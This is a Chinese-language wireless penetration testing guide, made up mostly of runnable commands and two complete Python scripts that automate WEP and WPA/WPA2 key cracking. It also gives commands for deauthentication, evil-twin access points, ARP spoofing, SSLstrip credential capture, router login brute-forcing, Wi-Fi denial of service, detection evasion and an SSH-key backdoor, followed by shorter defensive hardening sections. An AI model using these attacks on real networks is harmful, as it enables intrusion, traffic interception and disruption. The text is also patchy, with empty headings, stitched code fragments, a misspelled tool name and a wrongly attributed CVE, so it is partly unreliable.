127_无线网络安全与渗透测试实战指南——从WEP到WPA3的全面攻击与防御技术体系

# 启用监听模式
sudo airmon-ng start wlan0

# 验证监听模式是否启用
sudo iwconfig

# 扫描无线网络
airodump-ng wlan0mon

# 针对特定网络捕获数据包，并保存为cap文件
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

# 打开新终端，执行ARP请求重放攻击
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h FF:EE:DD:CC:BB:AA wlan0mon

# 如果没有关联到AP，可以先执行假认证
aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h FF:EE:DD:CC:BB:AA wlan0mon

# 使用碎片攻击生成更多IV
aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h FF:EE:DD:CC:BB:AA wlan0mon

# 使用捕获的数据包恢复WEP密钥
aircrack-ng -b AA:BB:CC:DD:EE:FF wep_capture-01.cap

#!/usr/bin/env python3
import subprocess
import time
import os
import argparse

def enable_monitor_mode(interface):
    """启用无线网卡的监听模式"""
    print(f"启用{interface}的监听模式...")
    subprocess.run(f"airmon-ng check kill", shell=True)
    subprocess.run(f"airmon-ng start {interface}", shell=True)
    return f"{interface}mon"

def scan_networks(mon_interface):
    """扫描周围的无线网络"""
    print(f"扫描无线网络...按Ctrl+C停止扫描")
    try:
        subprocess.run(f"airodump-ng {mon_interface}", shell=True)
    except KeyboardInterrupt:
        print("扫描已停止")

def capture_packets(mon_interface, bssid, channel, output_file):
    """捕获目标网络的数据包"""
    print(f"开始捕获目标网络数据包...")
    cmd = f"airodump-ng -c {channel} --bssid {bssid} -w {output_file} {mon_interface}"
    # 在后台运行数据包捕获
    return subprocess.Popen(cmd, shell=True)

def inject_packets(mon_interface, bssid, client_mac):
    """执行ARP请求重放攻击"""
    print("执行ARP请求重放攻击...")
    # 先执行假认证
    subprocess.run(f"aireplay-ng -1 0 -a {bssid} -h {client_mac} {mon_interface}", shell=True)
    # 然后执行ARP请求重放
    try:
        subprocess.run(f"aireplay-ng -3 -b {bssid} -h {client_mac} {mon_interface}", shell=True)
    except KeyboardInterrupt:
        print("数据包注入已停止")

def crack_wep_key(capture_file, bssid):
    """尝试恢复WEP密钥"""
    print("尝试恢复WEP密钥...")
    cmd = f"aircrack-ng -b {bssid} {capture_file}-01.cap"
    subprocess.run(cmd, shell=True)

def main():
    parser = argparse.ArgumentParser(description="WEP攻击自动化脚本")
    parser.add_argument("-i", "--interface", required=True, help="无线网卡接口名")
    parser.add_argument("-b", "--bssid", help="目标AP的MAC地址")
    parser.add_argument("-c", "--channel", help="目标AP的信道")
    parser.add_argument("-m", "--client-mac", help="客户端MAC地址")
    parser.add_argument("-o", "--output", default="wep_capture", help="输出文件名")
    args = parser.parse_args()
    
    # 启用监听模式
    mon_interface = enable_monitor_mode(args.interface)
    
    # 如果没有提供目标信息，执行扫描
    if not args.bssid or not args.channel:
        scan_networks(mon_interface)
        print("请使用扫描结果重新运行脚本，并提供目标BSSID和信道")
        return
    
    # 捕获数据包
    capture_proc = capture_packets(mon_interface, args.bssid, args.channel, args.output)
    
    try:
        # 如果提供了客户端MAC，执行数据包注入
        if args.client_mac:
            time.sleep(5)  # 等待捕获进程启动
            inject_packets(mon_interface, args.bssid, args.client_mac)
        
        # 等待用户中断
        print("数据包捕获正在进行中...")
        print("当收集到足够的IV后，按Ctrl+C停止并尝试破解密钥")
        capture_proc.wait()
    except KeyboardInterrupt:
        # 停止捕获进程
        capture_proc.terminate()
        # 尝试破解密钥
        crack_wep_key(args.output, args.bssid)

if __name__ == "__main__":
    if os.geteuid() != 0:
        print("请以root权限运行此脚本")
        exit(1)
    main()

# 扫描网络
python3 wep_attack.py -i wlan0

# 攻击特定网络
python3 wep_attack.py -i wlan0 -b AA:BB:CC:DD:EE:FF -c 6 -m FF:EE:DD:CC:BB:AA

PMK = PBKDF2(passphrase, SSID, 4096, 256 bits)

# 扫描无线网络
airodump-ng wlan0mon

# 针对特定网络捕获数据包，重点是握手包
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon

# 执行Deauthentication攻击
aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon

# 使用aircrack-ng进行字典攻击
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF wpa_capture-01.cap

# 使用Hashcat进行GPU加速破解
hashcat -m 2500 -a 0 wpa_capture.hccapx wordlist.txt

# 安装KRACK测试工具
git clone https://github.com/vanhoefm/krackattacks-scripts.git
cd krackattacks-scripts

# 编译攻击工具
make

# 运行攻击演示
./krack_demo.py wlan0mon

# 捕获包含PMKID的数据包
aiodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w pmkid_capture --output-format pcap wlan0mon

# 使用hcxdumptool进行更高效的PMKID捕获
hcxdumptool -i wlan0mon --enable_status=1 --filtermode=2 --enable_ap_attacks=1 -w pmkid.pcapng

# 转换为Hashcat支持的格式
hcxpcaptool -z pmkid.16800 pmkid.pcapng

# 使用Hashcat破解PMKID
hashcat -m 16800 -a 0 pmkid.16800 wordlist.txt

# 创建hostapd配置文件
cat > evil_twin.conf << EOF
interface=wlan0mon
driver=nl80211
ssid=TargetNetwork
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
EOF

# 启动伪造AP
hostapd -B evil_twin.conf

# 配置DHCP服务器
cat > dhcpd.conf << EOF
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.100 192.168.1.200;
  option routers 192.168.1.1;
  option domain-name-servers 8.8.8.8, 8.8.4.4;
}
EOF

# 配置接口和启动DHCP服务器
ifconfig wlan0mon 192.168.1.1 netmask 255.255.255.0
dhcpd -cf dhcpd.conf -f -d wlan0mon

# 设置IP转发和捕获流量
echo 1 > /proc/sys/net/ipv4/ip_forward
# 使用Wireshark或tcpdump捕获流量
tcpdump -i wlan0mon -w evil_twin_traffic.pcap

#!/usr/bin/env python3
import subprocess
import time
import os
import argparse
import threading
from datetime import datetime

def enable_monitor_mode(interface):
    """启用无线网卡的监听模式"""
    print(f"[+] 启用{interface}的监听模式...")
    subprocess.run("airmon-ng check kill", shell=True)
    result = subprocess.run(f"airmon-ng start {interface}", shell=True, capture_output=True, text=True)
    if "monitor mode enabled" in result.stdout:
        return f"{interface}mon"
    else:
        print("[-] 无法启用监听模式，请检查无线网卡是否支持监听模式")
        exit(1)

def scan_networks(mon_interface, scan_time=60):
    """扫描周围的无线网络"""
    print(f"[+] 扫描无线网络，持续{scan_time}秒...")
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    scan_file = f"scan_{timestamp}"
    
    cmd = f"timeout {scan_time} airodump-ng --write {scan_file} {mon_interface}"
    subprocess.run(cmd, shell=True)
    
    print("\n[+] 扫描结果:")
    result = subprocess.run(f"grep -B 1 -A 2 'WPA' {scan_file}-01.csv", shell=True, capture_output=True, text=True)
    print(result.stdout)
    
    return scan_file

def capture_handshake(mon_interface, bssid, channel, output_file):
    """捕获目标网络的握手包"""
    print(f"[+] 捕获目标网络 {bssid} 的握手包...")
    cmd = f"airodump-ng -c {channel} --bssid {bssid} -w {output_file} {mon_interface}"
    subprocess.run(cmd, shell=True)

def deauth_attack(mon_interface, bssid, client_mac=None, count=5):
    """执行Deauthentication攻击"""
    print(f"[+] 执行Deauthentication攻击...")
    if client_mac:
        cmd = f"aireplay-ng -0 {count} -a {bssid} -c {client_mac} {mon_interface}"
    else:
        cmd = f"aireplay-ng -0 {count} -a {bssid} {mon_interface}"
    
    subprocess.run(cmd, shell=True)
    print("[+] Deauthentication攻击完成")

def crack_handshake(capture_file, wordlist):
    """使用字典攻击破解握手包"""
    print(f"[+] 使用字典 {wordlist} 破解握手包...")
    cmd = f"aircrack-ng -w {wordlist} {capture_file}-01.cap"
    subprocess.run(cmd, shell=True)

def main():
    parser = argparse.ArgumentParser(description="WPA/WPA2攻击自动化脚本")
    parser.add_argument("-i", "--interface", required=True, help="无线网卡接口名")
    parser.add_argument("-b", "--bssid", help="目标AP的MAC地址")
    parser.add_argument("-c", "--channel", help="目标AP的信道")
    parser.add_argument("-m", "--client-mac", help="客户端MAC地址，用于定向Deauth攻击")
    parser.add_argument("-w", "--wordlist", help="字典文件路径")
    parser.add_argument("-s", "--scan-time", type=int, default=60, help="扫描时间（秒）")
    parser.add_argument("--deauth-count", type=int, default=5, help="Deauth攻击包数量")
    args = parser.parse_args()
    
    # 启用监听模式
    mon_interface = enable_monitor_mode(args.interface)
    
    # 如果没有提供目标信息，执行扫描
    if not args.bssid or not args.channel:
        scan_file = scan_networks(mon_interface, args.scan_time)
        print("\n[!] 请使用扫描结果重新运行脚本，并提供目标BSSID和信道")
        return
    
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    output_file = f"wpa_handshake_{timestamp}"
    
    # 启动捕获线程
    capture_thread = threading.Thread(target=capture_handshake, 
                                      args=(mon_interface, args.bssid, args.channel, output_file))
    capture_thread.daemon = True
    capture_thread.start()
    
    time.sleep(5)  # 等待捕获进程启动
    
    # 执行Deauth攻击
    deauth_attack(mon_interface, args.bssid, args.client_mac, args.deauth_count)
    
    print("\n[+] 正在捕获握手包，请等待...")
    print("[+] 当airodump-ng界面右上角出现'WPA handshake'时，表示已捕获到握手包")
    print("[+] 按Ctrl+C停止捕获")
    
    try:
        capture_thread.join()
    except KeyboardInterrupt:
        print("\n[+] 停止捕获")
    
    # 如果提供了字典文件，尝试破解
    if args.wordlist and os.path.exists(args.wordlist):
        crack_handshake(output_file, args.wordlist)
    else:
        print("\n[!] 未提供字典文件或文件不存在，跳过破解步骤")

if __name__ == "__main__":
    if os.geteuid() != 0:
        print("[!] 请以root权限运行此脚本")
        exit(1)
    main()

# 扫描网络
python3 wpa_attack.py -i wlan0

# 针对特定网络进行攻击并尝试破解
python3 wpa_attack.py -i wlan0 -b AA:BB:CC:DD:EE:FF -c 6 -w /usr/share/wordlists/rockyou.txt

# 针对特定客户端进行定向Deauth攻击
python3 wpa_attack.py -i wlan0 -b AA:BB:CC:DD:EE:FF -c 6 -m FF:EE:DD:CC:BB:AA -w /usr/share/wordlists/rockyou.txt

# 使用airodump-ng扫描并识别WPA3网络
airodump-ng --output-format csv,json -w wpa3_scan wlan0mon

# 在扫描结果中查找RSN信息，WPA3网络会包含SAE或OWE等标识

# 使用开源工具测试SAE侧信道漏洞
git clone https://github.com/vanhoefm/dragonblood.git
cd dragonblood
# 按照README中的说明运行测试工具

# 使用wpa_cli检查连接的安全参数
wpa_cli status
# 查看加密算法、认证方法等信息

# 检查设备是否支持PMF
iw list | grep -A 5 "protected management frame"

interface=wlan0

2. **hostapd配置文件（WPA3-Enterprise 192位安全套件）**：

3. **WPA3-SAE Transition Mode配置**：

### 4.6 WPA3网络的防御策略

#### 4.6.1 部署最佳实践

- **选择支持WPA3的设备**：购买和使用经过Wi-Fi联盟WPA3认证的设备
- **更新固件**：确保所有无线设备运行最新的固件，修复已知漏洞
- **启用PMF**：在所有支持的设备上启用受保护的管理帧
- **使用强密码**：尽管WPA3增强了对弱密码的保护，仍然应使用强密码
- **禁用WPS**：WPS可能引入额外的安全风险，应禁用此功能

#### 4.6.2 企业环境中的WPA3实施

- **使用WPA3-Enterprise**：企业环境应使用WPA3-Enterprise模式
- **部署RADIUS服务器**：使用可靠的RADIUS服务器进行用户认证
- **实施802.1X认证**：使用EAP-TLS等强认证方法
- **考虑192位安全套件**：对安全性要求极高的环境考虑使用192位安全套件
- **网络分段**：将无线网络与关键资产隔离

#### 4.6.3 监控与审计

- **部署WIDS/WIPS**：使用无线入侵检测/防御系统监控异常活动
- **定期安全审计**：评估无线网络配置和安全状态
- **监控认证日志**：记录和分析认证尝试，特别是失败的尝试
- **检测未授权设备**：识别网络中的未授权无线设备
- **定期渗透测试**：测试无线网络的安全防护能力

#### 4.6.4 针对已知漏洞的防护

- **应用安全补丁**：及时应用设备厂商发布的安全补丁
- **针对Dragonblood漏洞**：确保设备固件已修复Dragonblood系列漏洞
- **配置限制**：实施速率限制和访问控制，防止拒绝服务攻击
- **避免混合模式**：尽可能避免同时支持WPA2和WPA3，除非必要

### 4.7 WPA3攻击案例分析

#### 4.7.1 案例：Dragonblood漏洞利用

安全研究人员在测试某品牌AP的WPA3实现时发现了Dragonblood漏洞：

1. 研究人员使用支持监听模式的无线网卡捕获SAE认证过程
2. 通过分析认证过程中计算时间的微小差异，成功推断出部分密码信息
3. 使用优化的字典攻击方法，在几小时内破解了一个中等复杂度的密码
4. 向厂商报告了漏洞，厂商发布了固件更新修复了这个问题

#### 4.7.2 案例：WPA3过渡模式攻击

攻击者针对使用WPA3-SAE Transition Mode的网络进行了攻击：

1. 攻击者扫描发现目标网络同时支持WPA2-PSK和WPA3-SAE
2. 攻击者使用经典的WPA2握手包捕获和破解方法
3. 由于用户使用了简单密码，攻击者成功破解了WPA2密码
4. 使用获取的密码成功接入网络，绕过了WPA3的安全保护

#### 4.7.3 案例：配置错误导致的安全漏洞

某企业在配置WPA3-Enterprise网络时犯了几个关键错误：

1. 未启用PMF（受保护的管理帧）
2. 使用了弱RADIUS共享密钥
3. 未正确配置证书验证

安全评估人员发现这些问题后：
1. 利用未启用PMF的漏洞进行了管理帧注入攻击
2. 尝试破解RADIUS共享密钥
3. 成功绕过了证书验证，使用伪造的证书进行了身份验证

## 5. 无线网络渗透测试方法论

### 5.1 渗透测试概述

#### 5.1.1 无线网络渗透测试定义与目标

无线网络渗透测试是一种系统化的安全评估方法，旨在通过模拟攻击者的视角，发现无线网络中的安全漏洞和风险。其主要目标包括：

- **发现安全漏洞**：识别无线网络配置、加密和认证机制中的弱点
- **评估安全控制有效性**：验证现有安全措施的实际防护能力
- **提供修复建议**：针对发现的问题提供具体的安全加固方案
- **符合合规要求**：满足行业标准和法规对安全评估的要求
- **提高安全意识**：通过真实的攻击演示提高组织的安全意识

#### 5.1.2 渗透测试方法学框架

无线网络渗透测试通常遵循结构化的方法论框架，确保测试的全面性和系统性。常用的框架包括：

- **OSSTMM (Open Source Security Testing Methodology Manual)**：开源安全测试方法论手册，提供全面的无线网络测试指南
- **OWASP无线网络安全测试指南**：Web应用安全组织提供的无线网络安全测试方法
- **NIST SP 800-115**：美国国家标准与技术研究院提供的渗透测试指南
- **PTES (Penetration Testing Execution Standard)**：渗透测试执行标准，包含无线网络测试的详细步骤

一个典型的无线网络渗透测试方法论包括以下阶段：
1. 测试准备与范围确定
2. 侦察与情报收集
3. 漏洞扫描与识别
4. 漏洞验证与攻击实施
5. 后渗透测试
6. 结果分析与报告生成

#### 5.1.3 渗透测试类型

根据测试环境和授权范围，无线网络渗透测试可分为以下类型：

- **黑盒测试**：测试人员对网络架构和配置信息知之甚少，完全模拟外部攻击者
- **白盒测试**：测试人员拥有详细的网络架构和配置信息，可以进行更深入的测试
- **灰盒测试**：介于黑盒和白盒之间，测试人员拥有部分信息
- **红队测试**：模拟高级持续性威胁(APT)，进行长期、复杂的攻击测试
- **蓝队演练**：测试防御团队的检测和响应能力
- **无线网络专用测试**：专注于无线接入点、客户端和相关基础设施的测试

### 5.2 测试准备与范围确定

#### 5.2.1 测试授权与法律合规

在进行任何渗透测试之前，必须获得明确的书面授权，并确保测试活动符合法律法规要求：

- **书面授权文档**：详细说明测试范围、时间、方法和允许的行为
- **测试时间窗口**：明确测试执行的时间段，避免在关键业务时间进行
- **联系人信息**：提供测试期间的紧急联系人，以便在出现问题时及时沟通
- **法律合规检查**：确保测试活动符合当地法律法规，特别是关于无线网络监控的规定
- **保密协议**：与测试团队签署保密协议，保护测试过程中收集的信息

#### 5.2.2 测试范围界定

明确测试范围是确保测试有效性和安全性的关键：

- **物理边界**：确定测试可以进行的物理区域
- **目标网络**：指定需要测试的无线SSID和接入点
- **测试深度**：定义允许的测试方法和攻击深度
- **限制条件**：明确禁止使用的攻击方法，如拒绝服务攻击
- **排除项**：列出不需要测试的系统或服务

测试范围示例文档：

#### 5.2.3 测试团队准备

测试团队需要具备必要的技能和资源：

- **技能要求**：无线网络技术、安全测试技术、网络协议分析、密码学知识
- **工具准备**：无线网卡、渗透测试工具包、分析软件
- **知识更新**：了解最新的无线网络安全威胁和攻击技术
- **测试计划**：制定详细的测试步骤和时间表
- **应急方案**：准备测试过程中可能出现问题的应对措施

#### 5.2.4 环境准备

准备适当的测试环境和工具：

- **测试设备**：
  ```bash
  # 硬件设备清单
  - 支持监听模式的无线网卡 (如 Alfa AWUS036NH, TP-Link TL-WN722N v2/v3)
  - 笔记本电脑 (推荐Linux系统)
  - 备用电源
  - 信号放大器 (可选)

# 安装必要的渗透测试工具
sudo apt update
sudo apt install aircrack-ng kismet wireshark reaver bully mdk3 hostapd-wpe ettercap driftnet sslstrip python3-pip

# 安装Python工具
pip3 install scapy wifi-network-recon-tool

# 使用airodump-ng进行被动扫描
sudo airodump-ng --passive wlan0mon

# 使用Kismet进行更全面的无线网络发现
sudo kismet -c wlan0mon

# 使用airodump-ng进行主动扫描
sudo airodump-ng --essid-regex "Company" wlan0mon

# 使用iwlist进行简单扫描
sudo iwlist wlan0 scan

# 捕获包含隐藏网络信息的数据包
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon

# 使用airodump-ng收集详细信息
sudo airodump-ng --output-format csv,json -w network_info wlan0mon

# 分析收集到的数据
cat network_info-01.csv

# 专注于特定AP，收集连接的客户端信息
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w client_info wlan0mon

# 使用wireshark分析加密类型
sudo wireshark -i wlan0mon
# 在Wireshark中，过滤RSN信息元素查看加密详情

# 从MAC地址前6位查询厂商信息
# 例如查询MAC地址00:1B:44:xx:xx:xx的厂商
echo "00:1B:44" | xargs -I {} curl -s "https://api.macvendors.com/{}"

# 简单的AP位置估计脚本
import matplotlib.pyplot as plt

# 模拟不同位置的信号强度数据
positions = [(0, 0, -50), (10, 0, -60), (5, 10, -65)]  # (x, y, RSSI)

plt.figure(figsize=(10, 8))
for x, y, rssi in positions:
    # 信号强度可视化
    circle = plt.Circle((x, y), radius=5, fill=False, color='blue', linestyle='--')
    plt.gca().add_patch(circle)
    plt.text(x, y, f'AP (RSSI: {rssi}dBm)')

plt.xlabel('X Position')
plt.ylabel('Y Position')
plt.title('AP Position Estimation Based on RSSI')
plt.grid(True)
plt.savefig('ap_position_estimation.png')

# 使用Wireshark捕获并分析网络流量
sudo tshark -i wlan0mon -f "wlan type data" -c 1000 -w network_traffic.pcap

# 使用NetworkMiner分析捕获的数据包
# 从数据包中提取IP地址、主机名等信息

# 使用OSINT工具收集信息
# 搜索公司公开的无线网络信息
curl -s "https://www.example.com" | grep -i wifi

# 查看公司社交媒体上的相关信息

# 分析网络使用的加密类型
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --output-format csv -w crypto_check wlan0mon

# 在Wireshark中分析RSN信息元素
# 检查是否使用了弱加密算法

# 尝试从HTTP/HTTPS管理界面获取固件信息
curl -I http://192.168.1.1 | grep -i server

# 搜索已知的AP型号和固件版本漏洞

# 使用wash扫描支持WPS的AP及其漏洞
sudo wash -i wlan0mon

# 检查是否存在L7或pixie dust漏洞

# 分析是否使用了弱密码模式
# 例如检查是否使用了默认SSID格式
sudo airodump-ng --essid-regex "default|linksys|netgear" wlan0mon

# 扫描AP的管理接口
nmap -p 22,80,443,8080,8443 192.168.1.1

# 检查Web管理界面是否有已知漏洞

# 使用Kismet检测无线攻击
sudo kismet -c wlan0mon --daemonize
# 检查Kismet日志中的攻击警告

# 使用Wireshark分析802.11协议实现
sudo wireshark -i wlan0mon
# 过滤特定协议漏洞的数据包

# 使用专业的无线网络漏洞扫描工具
sudo wifi-honeyspot-scanner --interface wlan0mon --detect-evil-twin

# 使用WIDS/WIPS系统进行漏洞检测

# 简单的风险评分计算
def calculate_risk_score(severity, exploitability, impact):
    # 严重性: 1-10, 可利用性: 1-10, 影响: 1-10
    risk_score = (severity * 0.4) + (exploitability * 0.3) + (impact * 0.3)
    return round(risk_score, 2)

# 示例评分
wep_vulnerability = calculate_risk_score(9, 10, 9)  # 9.3
weak_password = calculate_risk_score(7, 8, 7)     # 7.4
print(f"WEP漏洞风险评分: {wep_vulnerability}")
print(f"弱密码风险评分: {weak_password}")

# 1. 捕获足够的IVs
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w wep_capture wlan0mon

# 2. 可选：使用aireplay-ng加速IV收集
sudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0mon

# 3. 破解WEP密钥
sudo aircrack-ng -b 00:11:22:33:44:55 wep_capture-01.cap

# 1. 捕获握手包
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w wpa_handshake wlan0mon

# 2. 可选：使用deauth攻击强制客户端重新连接
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

# 3. 使用字典攻击破解
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_handshake-01.cap

# 4. 使用hashcat进行GPU加速破解
hashcat -m 2500 wpa_handshake-01.hccapx /usr/share/wordlists/rockyou.txt -a 0

# 使用reaver进行WPS PIN破解
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

# 如果AP有L7保护，使用pixie dust攻击（如果支持）
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv

# 对特定客户端进行deauth攻击
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

# 对所有客户端进行广播deauth攻击
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon

# 使用ettercap进行ARP欺骗
sudo ettercap -i wlan0mon -T -q -M arp:remote /192.168.1.1// /192.168.1.100//

# 使用Wireshark捕获劫持的流量
sudo wireshark -i wlan0mon

# 设置evil twin AP
sudo airbase-ng -e "Free-WiFi" -c 6 wlan0mon

# 配置网络转发和欺骗
sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o at0 -j ACCEPT
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

# 使用随机MAC地址避免被检测
sudo macchanger -r wlan0mon

# 调整攻击参数，降低被检测概率
sudo aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB -o 1 -w 1 wlan0mon

# 使用mdk3进行DoS攻击（仅在授权的测试环境中使用）
sudo mdk3 wlan0mon d -b blacklist.txt -c 6

# 使用aireplay-ng进行身份验证洪水攻击
sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 wlan0mon

# 对AP管理界面进行暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login.cgi:user=^USER^&pass=^PASS^:Login failed"

# 检查Web管理界面的漏洞
nikto -h http://192.168.1.1

# 使用WiFi Explorer或inSSIDer进行频谱分析
# 识别2.4GHz和5GHz频段的干扰源

# 使用Kismet进行信号干扰检测
sudo kismet -c wlan0mon --daemonize

# 使用两个无线网卡建立中继
sudo airbase-ng -e "Relay-Network" -c 6 wlan0mon1
sudo iwconfig wlan0mon2 essid "Target-Network"
sudo brctl addbr br0
sudo brctl addif br0 at0 wlan0mon2
sudo ifconfig br0 up

# 使用GNU Radio和USRP进行高级无线攻击（需要额外硬件）
# 编译并安装GNU Radio
git clone --recursive https://github.com/gnuradio/gnuradio
cd gnuradio
mkdir build && cd build
cmake ..
make -j4
sudo make install

# 使用nmap扫描内网
nmap -sS -sV -O 192.168.1.0/24

# 使用netdiscover进行ARP扫描
sudo netdiscover -r 192.168.1.0/24

# 使用ettercap收集明文凭证
sudo ettercap -i at0 -T -q -M arp:remote /192.168.1.1// /192.168.1.0/24//

# 启动SSLstrip捕获HTTPS流量
sslstrip -l 8080

# 对内网主机进行漏洞扫描
openvas-cli --scan 192.168.1.0/24 --output results.xml

# 使用Metasploit进行漏洞利用
msfconsole

# 捕获网络流量
sudo tcpdump -i at0 -w internal_traffic.pcap

# 使用Wireshark分析捕获的流量
wireshark internal_traffic.pcap

# 使用NetworkMiner提取文件和凭证
networkminer --pcap internal_traffic.pcap

# 使用strings和grep搜索敏感信息
strings internal_traffic.pcap | grep -E "password|secret|token"

# 在获得的系统上设置后门（仅在授权测试环境中）
# 使用SSH密钥持久化
echo "ssh-rsa AAAAB3Nz..." >> /home/user/.ssh/authorized_keys

# 数据泄露影响评估

## 泄露数据类型
- 用户凭证（严重性：高）
- 内部通信（严重性：中）
- 非敏感业务文档（严重性：低）

## 潜在后果
1. 未授权访问内部系统
2. 身份盗用和欺诈
3. 知识产权泄露
4. 客户信任度下降

## 恢复时间估计
- 凭证重置：4-8小时
- 系统加固：1-2天
- 监控加强：持续进行

# 漏洞汇总表
## 严重级别：严重
1. WEP加密使用（CVE-无，CVSS评分：9.3）
2. WPS PIN可被破解（CVE-2011-3192，CVSS评分：8.6）

## 严重级别：高
1. 弱WPA2密码（CVE-无，CVSS评分：7.4）
2. 管理界面默认密码（CVE-无，CVSS评分：7.8）

# 典型攻击路径
外部网络 → WPS破解 → 网络访问 → ARP欺骗 → 凭证收集 → 内部系统访问

# 无线网络渗透测试报告

## 1. 执行摘要
本次渗透测试于2025年5月10日至15日进行，针对公司的无线网络基础设施。测试发现了多个严重安全漏洞，包括WEP加密使用、WPS漏洞和弱密码配置。这些漏洞可能允许未授权用户访问网络并获取敏感信息。建议立即实施报告中提供的安全加固措施。

## 2. 测试范围
- 物理位置：办公楼A、B栋
- 目标网络："Company-WiFi", "Guest-WiFi"
- 测试深度：包括加密破解、漏洞利用和配置审计

## 3. 方法论
测试遵循OSSTMM框架，包括以下阶段：
- 侦察与情报收集
- 漏洞扫描与识别
- 漏洞验证与攻击实施
- 后渗透测试
- 结果分析与报告生成

[详细内容...]

# hostapd配置WPA3-Personal
interface=wlan0

# WPA2-AES配置
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
# 禁用TKIP
wpa_pairwise=CCMP

# 设置密码策略
net accounts /minpwlen:12
net accounts /maxpwage:90
net accounts /minpwage:1
net accounts /uniquepw:5

# 使用组策略设置更详细的密码要求
# 计算机配置 > Windows设置 > 安全设置 > 账户策略 > 密码策略

# /etc/freeradius/3.0/mods-enabled/eap
eap {
    default_eap_type = tls
    tls {
        private_key_file = /etc/ssl/private/server.key
        certificate_file = /etc/ssl/certs/server.crt
        ca_file = /etc/ssl/certs/ca.crt
        dh_file = /etc/ssl/certs/dh.pem
        cipher_list = "DEFAULT:!EXP:!LOW:!MD5:!aNULL"
    }
}

# hostapd WPA2-Enterprise配置
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
eap_server=0
auth_server_addr=192.168.1.100
auth_server_port=1812
auth_server_shared_secret=radius_secret

# 使用wash验证WPS状态
sudo wash -i wlan0mon
# 检查输出中的WPS字段，禁用应为"n"

# hostapd中显式禁用WPS
wps_state=0

# 交换机VLAN配置示例
vlan 10  # 企业员工
vlan 20  # 访客网络
vlan 30  # IoT设备

interface GigabitEthernet1/0/1
 switchport mode access
 switchport access vlan 10

# 访客网络ACL示例
access-list 101 deny ip 192.168.20.0 0.0.0.255 192.168.10.0 0.0.0.255
access-list 101 permit ip 192.168.20.0 0.0.0.255 any

# hostapd客户端隔离配置
ap_isolate=1

# hostapd隐藏SSID
ignore_broadcast_ssid=1

# 单AP多SSID配置示例
interface=wlan0

#### 6.2.3 无线信号覆盖优化

合理的无线信号覆盖对安全和性能都很重要：

- **信号覆盖规划**：
- 进行现场无线勘测，确定最佳AP位置
- 使用信号强度预测软件（如Ekahau Site Survey）
- 避免信号泄露到建筑物外

- **功率调整**：
- 调整AP发射功率，减少信号外泄
- 配置示例：
  ```bash
  # hostapd功率设置
  txpower=15  # 设置为适当的值，单位dBm
  ```

- **定向天线使用**：
- 在需要定向覆盖的区域使用定向天线
- 避免使用全向天线导致的信号扩散
- 天线选择指南：
  | 场景 | 推荐天线类型 | 覆盖角度 |
  |------|------------|--------|
  | 开放办公区 | 全向天线 | 360° |
  | 长走廊 | 定向天线 | 90°-120° |
  | 单一房间 | 扇形天线 | 60° |

#### 6.2.4 有线网络安全集成

无线网络安全与有线网络安全密切相关，需要统一考虑：

- **有线侧安全控制**：
- 实施802.1X端口认证
- 配置端口安全（限制MAC地址）
- 启用风暴控制，防止广播风暴

- **交换机配置示例**：

- **边界防护**：
- 在无线和有线网络交界处部署防火墙
- 实施严格的流量过滤规则
- 监控异常流量模式

- **DHCP防护**：
- 配置DHCP监听（DHCP Snooping）
- 防止DHCP欺骗攻击
- 示例配置：
  ```
  # 启用DHCP监听
  ip dhcp snooping
  ip dhcp snooping vlan 10,20,30
  
  interface GigabitEthernet1/0/1
   ip dhcp snooping trust
  ```

### 6.3 访问控制机制

#### 6.3.1 MAC地址过滤

MAC地址过滤是一种简单但有限的访问控制方法：

- **MAC过滤配置**：
- 创建允许或拒绝的MAC地址列表
- 示例hostapd配置：
  ```bash
  # 启用MAC地址过滤
  macaddr_acl=1  # 1=允许列表，0=关闭，2=拒绝列表
  # 允许的MAC地址列表
  accept_mac_file=/etc/hostapd/accept.txt
  ```

- **accept.txt示例**：

- **局限性**：
- MAC地址可以被轻易欺骗
- 管理开销较大
- 仅应作为额外的安全层，而非主要防御手段

#### 6.3.2 802.1X网络接入控制

802.1X提供了基于端口的网络访问控制，是企业环境的推荐选择：

- **802.1X架构**：
- 认证者（Authenticator）：网络设备（交换机/AP）
- 申请者（Supplicant）：客户端设备
